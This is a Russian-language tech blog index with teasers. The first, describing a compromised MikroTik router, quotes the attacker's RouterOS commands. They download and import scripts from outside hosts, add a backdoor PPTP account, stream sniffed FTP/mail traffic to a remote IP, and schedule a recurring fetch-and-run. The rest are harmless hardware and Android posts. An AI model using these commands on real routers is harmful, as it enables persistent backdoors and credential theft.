После взлома микротик стал ПРОКСИ шпионом

Интернет
Следствия и Последствия взлома микротика
Недавно столкнулся с одним глюкующим микротиком, он стал терять пакеты и потерял управление по winbox.
Зайдя локально по мак адресу на устройство было видно то, что проц упёрт в 100%, фаервол соединений около 3000 штук, в логах только одна строчка. Порт винбокс поменяли.
Микротик с внешним айпишником и прошивкой 6.42.7
Ну ясно!
Микротик взломали!
Для начала вырубил webproxy на котором подсели сотки юзарей.
Вырубил носки.
и обратил внимание на правила в фаерволе и манглы.
О ужас! Этож открытый прокси сервер! Идёт перенаправление и перехват данных.
Во всех списках прокси листах он уже есть! ЁП!

В общем всё по порядку как это делали злодеи, ломатели микротиколв.
В терминале посмотрел последние комманды
/tool fetch url=http://47.96.89.95:8000/autosupout.rif;:delay 5;/im autosupout.rif;/file remove
[find name=autosupout.rif];:if ([:len [/ip pool find name=dodo]]=0) do={/ip pool add name=dodo range=100.64.0.1-1
00.64.254;/ppp pro add name=dodo copy-from=default-encryption local-address=100.64.0.0 remote-address=dodo;/ppp se
c add name=dodo pass=dodo profile=dodo;/in pptp-ser server set enabled=yes;/ip fi nat add chain=srcnat src-address
=100.64.0.0/16 action=masquerade}

/tool sniffer set streaming-server=37.1.207.114 streaming-enabled=yes
/tool sniffer set filter-interface=all filter-ip-protocol=tcp,udp filter-port=20,21,110,143,150
0,10000 

/system scheduler add name="CMD_OS" start-time="startup" interval="00:01:00" on-event="/tool fe
tch url=http://src-ip.com/cmd.txt mode=http dst-path=i113.rsc\r\n/import i113.rsc;:delay 6s;/file remove i113.rsc"


из последнего было ясно что запущена пачка комманд с ресурса src-ip.com/cmd.txt
код
Читать дальше

Правда и лож антивируса AVG (Мифы антивируса)

Интернет
Установил бесплатный антивирус AVG ПК.
Потестировал, постоянно вылазит всякая хрень, то пытаются оптимизировать то усилить защиту сообщения на дурачка,

ЗАДАЛБАЛ ЭТОТ AVG.

Вдруг откуда не возьмись появилась очередная утка от этого антивируса AVG.
Явно враньё, AVG Вы возможно считаете всех дураками?
Да и написано неграмотно — просто отвратительно.
Собственно предупреждение
Найдены 4 проблемы с конфиденциальностью
Как AVG пудрит голову и враньё

Читать дальше

псевдо POE свитч своими руками (самодельный poe коммутатор)

СХЕМЫ
Для питания одной IP камеры по одному проводу требуется POE адаптер.
А ели камер более чем одна? Кучу адаптеров? Да ещё соединять через коммутатор кучу проводов и блоков питания.
Решено сделать самодельный коммутатор с питанием IP камер в стиле аля POE.
Со стороны камеры я просто подключусь к синей и коричневой паре на + -. Сама по себе камера с POE может даже не стартанёт.
PoE расшифровывается как Power over Ethernet — технология, позволяющая передавать удалённому устройству электрическую энергию вместе с данными через стандартную витую пару в сети Ethernet.
Читать дальше

как настроить Wifi в ip камере из китая

ip камера, настройка wifi, aliexpress,  ip камера говняная с али
Купил на алиэкспресе IP камеру, у продавца
IP CAM WIFI China1. Камера оказалась говняная. Качество отстой. Сенсор:CMOS
По проводу настроил без проблем, а вот по wifi не работает.
Сразу скажу то, что данный случай очень редкий, и камера по вайфай настраивается просто и находит сети и работает. Даже бывает что сама раздаёт вайфай и для кофигурирования к ней достаточно просто подключиться и настроить.
Но камера оказалать не из простых.
Как настраивал:
Читать дальше

на 1 августа 2018 Более 200 000 маршрутизаторов MikroTik заражены

Интернет
Сразу несколько ИБ-специалистов и компаний зафиксировали волну атак, направленную против маршрутизаторов MikroTik по всему миру. Первым на происходящее обратил внимание бразильский исследователь, известный под ником MalwareHunterBR.
микротик взломан майнинг
Читать дальше

Wi-fi розетка на esp8266 Умный дом

esp8266
Умная розетка на ESP-wifi esp8266 esp-07В сети Интернет поискал и нашёл много разных исполнений умных радиоуправляемых wifi розеток, но все варианты мне неустраивали или по исполнению или по методу управления или ардуино или инфа какая-то есть, но скучно читать — ни одной картинки, безобразие!!!

Представляю Вам Wifi розетку на модуле ESP8266.


Читать дальше

Налобный универсальный светодиодный фонарь 18650

Рекомендую к покупке компактный очень яркий светодиодный фонарь с АЛИ!
бюджетный светодиодный налобный и ручной фонарь с али
Возможно и бюджетный, но этот фанарь на мощных 3х ватных светодиодах поражает своей компактностью, многофункциональностью и универсальностью, а самое главное мощностью светодиодов.
Аккумулятор обычный 18650 и зарядка от микроUSB.
Читать дальше

MIUI 10 Root установка SUPERSU на Xiaomi redmi 4x

Разное в электронике
miui 10Не так давно вышла новая ОС ANDROID MIUI 10. Полсе установки многие хотят пойти дальше, например поудалять всякие муи гадости, удалить хром и гугл музыку и прочий встроенных хлам.
Но для этого нужет root uninstaller ну и сами права ROOT.

Для установки Root прав на MIUI 10 я использовал те же самые шаги что и на MIUI 9.

В принципе если Вы уже имеете установленный TWRP рекавери то можно прошить не только смартфон Xiaomi node 4x но и другой с MIUI 10, MIUI 9.

Читать дальше